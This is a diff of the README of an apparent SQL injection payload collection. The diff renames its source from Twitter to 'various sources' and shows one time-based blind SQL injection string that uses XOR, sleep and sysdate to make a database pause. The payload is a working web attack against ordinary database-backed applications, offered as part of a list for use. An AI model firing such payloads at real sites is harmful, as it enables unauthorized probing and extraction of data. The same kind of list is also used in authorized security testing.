m-cetin/sqliPayloads/README.md

-# Collection of SQLi payloads from Twitter
+# Collection of SQLi payloads from various sources

 ```
 -1'XOR(if(now()=sysdate(),sleep(3*2),0))XOR'Z